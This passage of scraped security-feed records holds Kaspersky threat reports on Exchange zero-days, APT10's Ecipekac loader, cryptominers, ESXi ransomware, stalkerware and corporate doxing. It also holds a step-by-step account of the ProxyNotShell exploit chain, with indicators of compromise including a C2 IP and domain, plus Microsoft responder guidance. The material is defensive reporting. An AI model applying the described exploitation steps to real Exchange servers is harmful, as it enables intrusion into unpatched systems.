attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>).\n\nOur [threat intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) indicates that companies across the globe have been targeted in attacks that exploit these vulnerabilities \u2013 with the greatest focus on Europe and the US.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>)Kaspersky products protect against this threat with [behavior-based detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [exploit prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components. We also detect and block the backdoors used in the exploitation of these vulnerabilities. Our EDR ([Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>)) solution helps to identify attacks in the early stages by marking suspicious actions with special IoA (Indicators of Attack) tags and by creating corresponding alerts.\n\nOur recommendations for staying safe from attacks using these vulnerabilities can be found [here](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>).\n\n### Ecipekac: sophisticated multi-layered loader discovered in A41APT campaign\n\nA41APT is a long-running campaign, active from March 2019 to the end of December 2020, that has targeted multiple industries, including Japanese manufacturing and its overseas bases. We believe, with high confidence, that the threat actor behind this campaign is APT10.\n\nOne particular piece of malware from this campaign is called Ecipekac (aka DESLoader, SigLoader, and HEAVYHAND). It is a very sophisticated multi-layer loader module used to deliver payloads such as SodaMaster, P8RAT, and FYAnti which in turn loads QuasarRAT.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25134233/APT10_and_the_A41_APT_campaign_14.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25134233/APT10_and_the_A41_APT_campaign_14.png>)The operations and implants of the campaign are remarkably stealthy, making it difficult to track the threat actor's activities. The threat actor behind the campaign implements several measures to conceal itself and make it more difficult to analyze. Most of the malware families used in the campaign are fileless malware and have not been seen before.\n\nWe believe that the most significant aspect of the Ecipekac malware is that the encrypted shellcodes are inserted into digitally signed DLLs without affecting the validity of the digital signature.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25132856/APT10_and_the_A41_APT_campaign_05.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/25132856/APT10_and_the_A41_APT_campaign_05.png>)\n\nWhen this technique is used, some security solutions cannot detect these implants. Judging from the main features of the P8RAT and SodaMaster backdoors, we believe these modules are downloaders responsible for downloading further malware which we have so far been unable to obtain.\n\nYou can find out more about the campaign [here](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Other malware\n\n### Fake ad blocker, with miner included\n\nSome time ago, we discovered a number of fake applications being used to deliver a Monero crypto-currency miner to target computers. The fake programs are distributed through malicious websites that may be listed in the victim's search results. We believe this is a continuation of [a campaign last summer, reported by Avast](<https://blog.avast.com/fake-malwarebytes-installation-files-distributing-coinminer>), in which the malware masqueraded as the Malwarebytes antivirus installer. In [the latest campaign](<https://securelist.com/ad-blocker-with-miner-included/101105/>), we observed the malware impersonating several applications: the ad blockers AdShield and Netshield, as well as the OpenDNS service.\n\nOnce the victim has started the program, it changes the DNS settings on the device so that all domains are resolved through the attackers' servers: this prevents the victim from accessing certain antivirus sites. The malware then updates itself: the update also downloads and runs a modified Transmission torrent client, which sends the ID of the targeted computer, along with installation details, to the C2 server. It then downloads and installs the miner.\n\nData from Kaspersky Security Network showed that, from February 2021 until the time we published our report, there were attempts to install fake applications on the devices of more than 7,000 people. At the peak of the current campaign, more than 2,500 people were attacked each day, with most victims located in Russia and CIS countries. \n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/05122816/01-en-ru-fake-adshield-miner-diagram.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/05122816/01-en-ru-fake-adshield-miner-diagram.png>)\n\n### Ransomware encrypting virtual hard disks\n\nRansomware gangs are exploiting vulnerabilities in VMware ESXi to target virtual hard disks and encrypt the data stored on them. The ESXi hypervisor lets multiple virtual machines store information on a single server using the SLP (Service Layer Protocol).\n\nThe first vulnerability ([CVE-2019-5544](<https://www.vmware.com/security/advisories/VMSA-2019-0022.html>)) can be used to carry out [heap overflow attacks](<https://encyclopedia.kaspersky.com/glossary/heap-overflow-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). The second ([CVE-2020-3992](<https://www.vmware.com/security/advisories/VMSA-2020-0023.html>)) is a [Use-After-Free (UAF) vulnerability](<https://encyclopedia.kaspersky.com/glossary/use-after-free/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) related to the incorrect use of dynamic memory during program operation. Once attackers have been able to gain an initial foothold in the target network, they can use the vulnerabilities to generate malicious SLP requests and compromise data storage.\n\nThe vulnerabilities are being exploited by [RansomExx](<https://www.kaspersky.com/blog/ransomware-in-virtual-environment/39150/>). The [Darkside](<https://www.infosecurity-magazine.com/news/darkside-20-ransomware-fastest/>) group is reportedly using the same approach; and the attackers behind the [BabuLocker Trojan](<https://twitter.com/campuscodi/status/1354237766285012992>) have also hinted that they are able to encrypt ESXi.\n\n### macOS developments\n\nTowards the end of last year, Apple unveiled machines powered by its own M1 chip, designed to replace Intel's processors in its computers. The Apple M1, a direct relative of the processors used in the iPhone and iPad, will ultimately allow Apple to unify its software under a single architecture.\n\nJust a few months after the release of the first Apple M1 computers, malware writers had already recompiled their code to adapt it to the new architecture.\n\nThese include the developers of XCSSET, malware [first discovered last year](<https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html>), which targets Mac developers by injecting a malicious payload into Xcode IDE projects on the victim's Mac. This payload is subsequently executed during the building of project files in Xcode. XCSSET modules are able to read and dump Safari cookies, inject malicious JavaScript code into various websites, steal files and information from applications such as Notes, WeChat, Skype, Telegram and others, and encrypt files. The samples we have observed include some compiled specifically for the Apple Silicon chips.\n\nSilver Sparrow is [another new threat](<https://redcanary.com/blog/clipping-silver-sparrows-wings/>) that targets the M1 chip. This malware introduces a new way for malware writers to abuse the default packaging functionality: instead of placing a malicious payload inside pre-install or post-install scripts, they hid one in the Distribution XML file. This payload uses JavaScript API to run bash commands in order to download a JSON configuration file. The sample extracts a URL from the "downloadURL" field for the next download. An appropriate Launch Agent is also created for persistent execution of the malicious sample. The JavaScript payload can be executed regardless of chip architecture, but analysis of the package file makes it clear that it supports both Intel and M1 chips.\n\nMost malicious objects detected for the macOS platform are adware. The developers of these programs are also updating their code to include support for the M1 chip, including the Pirrit and Bnodlero families.\n\nYou can find technical details, along with our FAQ on M1 threats, [here](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\nCybercriminals don't just add support for new platforms: sometimes they use new programming languages to develop their 'products'. Recently, macOS adware developers have been paying more attention to new languages, apparently in the hope that such code will be more opaque to virus analysts who have little or no experience with the newer languages. We have already seen quite a few samples written in Go, and recently cybercriminals have turned their attention to Rust as well. You can read our analysis of a new adware program called Convuster [here](<https://securelist.com/convuster-macos-adware-in-rust/101258/>).\n\n### Secondhand news\n\nThere's a strong market in secondhand computing devices. Some of our researchers recently looked at [the security implications of buying and selling secondhand devices](<https://www.kaspersky.com/blog/data-on-used-devices/38610/>): their aim was to see what traces are left behind on laptops and other storage data when people sell them.\n\nThe overwhelming majority of the devices we investigated contained at least some traces of data \u2013 mostly personal but some corporate. Researchers were able to access data on more than 16% of the devices outright. A further 74% contained data that could be recovered using [file-carving](<https://en.wikipedia.org/wiki/File_carving>) methods. Only 11% of devices had been wiped properly.\n\nThe data recovered ranged from the harmless to revealing and even dangerous: calendar entries, meeting notes, access data for corporate resources, internal business documents, personal photos, medical information, tax documents and more. Some of the data could be used directly \u2013 for example, contact information, tax documents and medical records (or access to them through saved passwords). Other data could lead to indirect damage if exploited by cybercriminals.\n\nAside from the data that could be exposed, there's also a risk that malware left on a device could infect the new owner. We found malware on 17% of the devices we looked at.\n\nSellers need to consider what traces they might leave behind when they sell a device; and buyers need to think about the security of any secondhand device they buy.\n\nThe UK National Cyber Security Centre (NCSC) provides good [practical advice for buyers and sellers](<https://www.ncsc.gov.uk/guidance/buying-selling-second-hand-devices>).\n\n### Stalkerware during the pandemic\n\n[Stalkerware](<https://csr.kaspersky.com/en/antistalking/eng.html>) is commercially available software used to spy on another person via their device, without that person's knowledge or consent. Stalkerware is the digital tip of a very real-world iceberg. In a 2017 report, the European Institute for Gender Equality indicates that seven out of 10 women affected by online stalking have experienced physical violence at the hands of the perpetrator. The [Coalition Against Stalkerware](<https://stopstalkerware.org/>) defines stalkerware as software which "may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence".\n\nThe number of people affected by stalkerware has been growing in recent years. We saw a fall in numbers in 2020, the drop-off coinciding with the worldwide lockdowns that came in the wake of the COVID-19 pandemic. This is hardly surprising: since stalking is typically carried out by someone the target lives with, if both abuser and target are housebound, there is less need to use technology to track someone's activities. Notwithstanding the _relative_ decline, 53,870 is a big number. Moreover, these are numbers of Kaspersky customers: no doubt the real figure is considerably higher.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/26124943/01-en-stalkerware-report.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/26124943/01-en-stalkerware-report.png>)The most commonly detected stalkerware sample in 2020 was Monitor.AndroidOS.Nidb.a. This app is re-sold under other names, so it is prominent in the market \u2013 iSpyoo, TheTruthSpy and Copy9 apps are all part of this family. Another popular application is Cerberus, which is sold as anti-theft smartphone protection and hides itself to avoid notice. Like genuine phone-finding apps, Cerberus has access to geo-location, can take photos and screenshots and record sound. Other high-ranking stalking apps include Track My Phone (which we detect as Agent.af), MobileTracker and Anlost.\n\n**Top 10 most detected stalkerware samples globally**\n\n| Samples | Affected users \n---|---|--- \n1 | Monitor.AndroidOS.Nidb.a | 8147 \n2 | Monitor.AndroidOS.Cerberus.a | 5429 \n3 | Monitor.AndroidOS.Agent.af | 2727 \n4 | Monitor.AndroidOS.Anlost.a | 2234 \n5 | Monitor.AndroidOS.MobileTracker.c | 2161 \n6 | Monitor.AndroidOS.PhoneSpy.b | 1774 \n7 | Monitor.AndroidOS.Agent.hb | 1463 \n8 | Monitor.AndroidOS.Cerberus.b | 1310 \n9 | Monitor.AndroidOS.Reptilic.a | 1302 \n10 | Monitor.AndroidOS.SecretCam.a | 1124 \n \nThe greatest number of stalkerware detections occurred in Russia, Brazil and the US.\n\n**Top 10 most affected countries by stalkerware \u2013 globally**\n\n| Country | Affected users \n---|---|--- \n1 | Russian Federation | 12389 \n2 | Brazil | 6523 \n3 | United States of America | 4745 \n4 | India | 4627 \n5 | Mexico | 1570 \n6 | Germany | 1547 \n7 | Iran | 1345 \n8 | Italy | 1144 \n9 | United Kingdom | 1009 \n10 | Saudi Arabia | 968 \n \nYou can read our full report on the subject [here](<https://securelist.com/the-state-of-stalkerware-in-2020/100875/>).\n\nStalkerware operates stealthily, so it's difficult for anyone targeted with such programs to see that it's installed on their device \u2013 they hide the app's icon and remove other traces of their presence.\n\nKaspersky is actively working to end the use of stalkerware, not just by detecting it but by working with partners. In 2019, Kaspersky and nine other founding members created the [Coalition Against Stalkerware](<https://stopstalkerware.org/>). Last year, we created [TinyCheck](<https://github.com/KasperskyLab/TinyCheck>), a free tool to detect stalkerware on mobile devices \u2013 specifically for service organizations working with people facing domestic violence. We are one of five partners in an EU-wide project aimed at tackling gender-based cyber-violence and stalkerware called DeStalk, which the European Commission chose to support with its Rights, Equality and Citizenship Program.\n\n### Doxing in the corporate sector\n\nWhen most people think of [doxing](<https://encyclopedia.kaspersky.com/glossary/doxxing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), they tend to think it applies only to celebrities and other high-profile people. However, confidential corporate information is no less sensitive; and the financial and reputational impact resulting from the disclosure of such data means that any organization could become a victim of doxing. This is clear, for example, from the fact that several ransomware gangs now threaten to leak stolen corporate data to increase the likelihood that their victims will pay up.\n\nCybercriminals use a variety of methods to gather confidential corporate information.\n\nOne of the easiest approaches is to use open-source intelligence (OSINT) \u2013 that is, gathering data from publicly accessible sources. The internet provides a lot of helpful information to would-be attackers, including the names and positions of employees, including those who occupy key positions in the company: for example, the CEO, HR director and chief financial officer.\n\nInformation harvested from the online personal profiles of employees can be used to set up [BEC](<https://encyclopedia.kaspersky.com/glossary/bec/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (Business Email Compromise) attacks, in which an attacker initiates email correspondence with a member of staff by posing as a different employee (including their superior) or as a representative of a partner company. The attacker does this to gain the trust of the target before persuading them to perform certain actions, such as sending confidential data or transferring funds to an account controlled by the attacker.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26124957/Corporate_doxing_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26124957/Corporate_doxing_01.png>)\n\nBEC attacks can also be used to collect further information about the company, or to gain access to valuable corporate data, or access to company resources \u2013 for example, credentials allowing access to cloud-based systems. \nThere are various technical tricks that cybercriminals use to obtain information relevant to their particular goals, including sending [email messages containing a tracking pixel](<https://www.kaspersky.com/blog/tracking-pixel-bec/36976/>) \u2013 often disguised as a "test" message.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125040/Corporate_doxing_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125040/Corporate_doxing_02.png>)\n\nThis enables attackers to obtain data such as the time the email was opened, the version of the recipient's mail client and the IP address. This data lets the attackers build a profile on a specific person who they can then impersonate in subsequent attacks.\n\nPhishing continues to be an effective way for attackers to gather corporate data. For example, they may send an employee a message that mimics a notification from a business platform such as SharePoint, which contains a link.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125148/Corporate_doxing_04.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125148/Corporate_doxing_04.jpg>)\n\nIf the employee clicks the link, they are redirected to a spoofed website containing a fraudulent form for entering their corporate account credentials \u2013 data which is captured by the attackers.\n\nSometimes cybercriminals resort to phone phishing \u2013 either by calling an employee directly and trying to "phish" corporate information, or sending a message and asking them to call the number given in the message. One way to trick employees is to pose as IT support staff \u2013 this method was used in the [Twitter hack](<https://www.dfs.ny.gov/Twitter_Report>) in July 2020.\n\n> By obtaining employee credentials, they were able to target specific employees who had access to our account support tools. They then targeted 130 Twitter accounts - Tweeting from 45, accessing the DM inbox of 36, and downloading the Twitter Data of 7.\n> \n> -- Twitter Support (@TwitterSupport) [July 31, 2020](<https://twitter.com/TwitterSupport/status/1289000208701878272?ref_src=twsrc%5Etfw>)\n\nAttackers may not confine themselves to gathering publicly available data, but may also hack an employee's account. This could be used to gain a foothold in the company, from which they can extend their activities, or to circulate false information that could damage the company's reputation and result in financial loss. There has even been a case where cybercriminals have obtained audio and video content of the CEO of an international company and [used deepfake technology to imitate the CEO's voice](<https://www.kaspersky.com/blog/machine-learning-fake-voice/28870/>), using it to persuade the management team of one of the company's branches to transfer money to the scammers.\n\nYou can read our full report on doxing, including tips on how to protect yourself, [here](<https://securelist.com/corporate-doxing/101513/>).", "cvss3": {}, "published": "2021-05-31T10:00:37", "type": "securelist", "title": "IT threat evolution Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-5544", "CVE-2020-3992", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:37", "id": "SECURELIST:A823F31C04C74DD103337324E6D218C9", "href": "https://securelist.com/it-threat-evolution-q1-2021/102382/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-19T16:54:06", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19160500/abstract_black_matrix-990x400.jpg)\n\n## Summary\n\nAt the end of September, GTSC reported an attack on critical infrastructure that took place in August. During the investigation, experts found that two 0-day vulnerabilities in Microsoft Exchange Server were used in the attack. The first one, later identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability that allows an authenticated attacker to remotely trigger the next vulnerability \u2013 CVE-2022-41082. The second vulnerability, in turn, allows remote code execution (RCE) when MS Exchange PowerShell is accessible to the attacker. As noted in the GTSC report, both vulnerabilities were exploited together in the wild to create a backdoor on a vulnerable server, and perform lateral movement.\n\nAfter CVE-2022-41040 and CVE-2022-41082 were revealed, Microsoft provided [mitigation guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) followed by a few updates. According to the company, the vulnerabilities affect MS Exchange Server 2013, MS Exchange Server 2016 and MS Exchange Server 2019.\n\nOn October 11, 2022, Microsoft released patches to cover these vulnerabilities as part of its Patch Tuesday update. After that, on November 17, a security researcher published the first working PoC. It was a Python script that accepts the following parameters: user, password, mail address and command line to be executed on the victim's host.\n\nThe cybersecurity community dubbed the pair of vulnerabilities **ProxyNotShell**. The name refers to a recent ProxyShell attack chain containing similar vulnerabilities in Exchange Servers that were disclosed in 2021. ProxyShell is a set of three vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207. Attackers used them to create web shells and execute arbitrary code on vulnerable Microsoft Exchange Servers.\n\n## ProxyNotShell exploitation details\n\nThe first step in this attack is exploiting **CVE-2022-41040** to get access to the PowerShell API endpoint. Using an insufficient filtering of input data in the Exchange **Autodiscover** mechanism, an attacker with a known login and password combination for a registered account, can gain access to the privileged endpoint of the Exchange Server API (**https://%_exchange server domain%_/powershell)**. This access allows the attacker to execute PowerShell commands in Exchange's environment on the server machine, passing them in the payload via the XML SOAP protocol.\n\nAt the next step, the attacker must get access to **Web-Based Enterprise Management (WBEM)** via the **WSMAN Protocol**. The attacker initiates the shell on the vulnerable system for further PowerShell script execution via **Windows Remote Management (PsRemoting)**.\n\n[![HTTP POST request with XML SOAP to initiate PsRemoting](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083206/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_01-1024x467.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083206/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_01.png>)\n\n**_HTTP POST request with XML SOAP to initiate PsRemoting_**\n\nAfter initiation of the shell, the attacker should immediately extend its lifetime; otherwise, the shell will be closed as its expiration time is too short by default. This is necessary for further command execution on Exchange Server. To do that the attacker immediately sends a special request via **WSMAN** that enables the **keep alive** option.\n\n[![HTTP POST request with XML SOAP to extend the shell's lifetime](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083245/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_02-1024x541.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083245/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_02.png>)\n\n**_HTTP POST request with XML SOAP to extend the shell's lifetime_**\n\nAfter that, the attacker exploits a second vulnerability \u2013 **CVE-2022-41082**. By using PowerShell Remoting the attacker sends a request to create an address book, passing encoded and serialized data with a special payload as a parameter. In a published PoC, this encoded data contains a gadget called **System.UnitySerializationHolder** that spawns an object of the **System.Windows.Markup.XamlReader** class. This class processes XAML data from a payload, which creates a new object of the **System.Diagnostics** class and contains a method call to open a new process on the target system. In the published PoC, this process is **calc.exe**.\n\n[![HTTP POST request with XML SOAP to start new process](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083322/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_03-1024x417.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083322/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_03.png>)\n\n**_HTTP POST request with XML SOAP to start new process_**\n\n[![Main payload portion that executes the calc.exe process](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083400/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19083400/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_04.png>)\n\n**_Main payload portion that executes the calc.exe process_**\n\n## ProxyNotShell post exploitation\n\nA few weeks later after the vulnerability was disclosed, Kaspersky detected a successful exploitation of **ProxyNotShell** in the wild. The actor performed the following actions:\n\n * Reconnaissance (users, groups, domains)\n * Various hijack attempts (even dropping vulnerable binaries)\n * Remote process injection\n * Persistence\n * Reverse shell\n\nIn this case, the attacker had the credentials to perform such an intrusion. They exploited the company's Exchange Server and as a result were able to create any process they wanted on the Exchange machine, passing commands as a payload.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19095522/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_05-1024x764.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/12/19095522/Vulnerabilities_CVE-2022-41040_and_CVE-2022-41082_in_MS_Exchange_05.png>)\n\nOn the server side all processes that are started via exploitation have a main parent process with certain parameters: **w3wp.exe -ap "msexchangepowershellapppool".**\n\nThese post-exploitation steps of the attack are very similar to the steps in the attack reported by [TrendMicro](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.trendmicro.com%2Fpl_pl%2Fresearch%2F22%2Fg%2Flog4shell-vulnerability-in-vmware-leads-to-data-exfiltration-and-ransomware.html&data=05%7C01%7Cmapp%40microsoft.com%7C6ea0cb7fcd7d4d2ea92808dab12e25ff%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C638017110445189023%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000%7C%7C%7C&sdata=O5D%2B8%2BG%2F%2BthCuhizLONIBuphB6uNAL%2Fp%2BrWWkWfQGa0%3D&reserved=0>), with the only difference being the vulnerabilities that are exploited.\n\nOur products protect against all of these post exploitation steps as well as other attacks leveraging the **CVE-2022-41040** and **CVE-2022-41082** vulnerabilities. The detection name for **ProxyNotShell** is **PDM:Exploit.Win32.Generic**.\n\n## Our recommendations\n\nA few words of advice to those worried about possible exploitation of ProxyNotShell or other 0-day vulnerabilities:\n\n * Focus your defense strategy on detecting lateral movement and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections.\n * Use the latest [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) data to stay aware of actual TTPs used by threat actors.\n * Use a security solution with exploit prevention, vulnerability and patch management components, such as Kaspersky Endpoint Security for Business. Our [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) component monitors suspicious actions by applications and blocks the execution of malicious files.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) that identify and stop attacks in the early stages.\n\n## Indicators of compromise\n\nF77E55FD56FDAD21766CAA9C896734E9 | LockDown.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n---|---|---|--- \nF9322EAD69300501356B13D751165DAA | mfeann.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \nA2FAE32F116870E5A94B5FAB50A1CB71 | Svchosts.exe | Malware reverse proxy | Trojan.Win64.Agent.qwibok \nHEUR:HackTool.Win64.Proxy.gen \n47A0814408210E6FCA502B3799B3952B | Glib-2.0.dll | Malware hijack library | Trojan.Win64.Dllhijacker \n379F87DAA6A23400ADF19C1CDD6B0DC9 | vmwarexferlogs.exe | Dropped vulnerable binary for DLL hijack | PDM:Exploit.Win32.Generic \n193.149.185.52:443 | \u04212 server \nsync.service.auzreservices.com | \u04212 server", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-19T16:15:49", "type": "securelist", "title": "CVE-2022-41040 and CVE-2022-41082 \u2013 zero-days in MS Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-19T16:15:49", "id": "SECURELIST:0D5B4F09314C45AF952E2FD68F88B8D0", "href": "https://securelist.com/cve-2022-41040-and-cve-2022-41082-zero-days-in-ms-exchange/108364/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "msrc": [{"lastseen": "2023-12-03T15:51:43", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065, which are being exploited. We strongly urge customers to immediately update systems. Failing to address these vulnerabilities can result in compromise of your on-premises Exchange Server and, potentially, other parts of your internal network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T07:00:00", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T07:00:00", "id": "MSRC:5CBA045F26BE90EBCCB3C34E5CE2A790", "href": "https://msrc.microsoft.com/blog/2021/03/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:07:39", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, and CVE-2021-27065, which are being exploited. We strongly urge customers to immediately update systems. Failing to address these vulnerabilities can result in compromise of your on-premises Exchange Server and, potentially, other parts of your internal network.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-16T07:00:00", "type": "msrc", "title": "Guidance for responders: Investigating and remediating on-premises Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-16T07:00:00", "id": "MSRC:9DA5AC102EA6224E027868594A8ED7B8", "href": "/blog/2021/03/guidance-for-responders-investigating-and-remediating-on-premises-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-16T18:53:05", "description": "This guidance will help customers address threats taking advantage of the recently disclosed Microsoft Exchange Server on-premises vulnerabilities 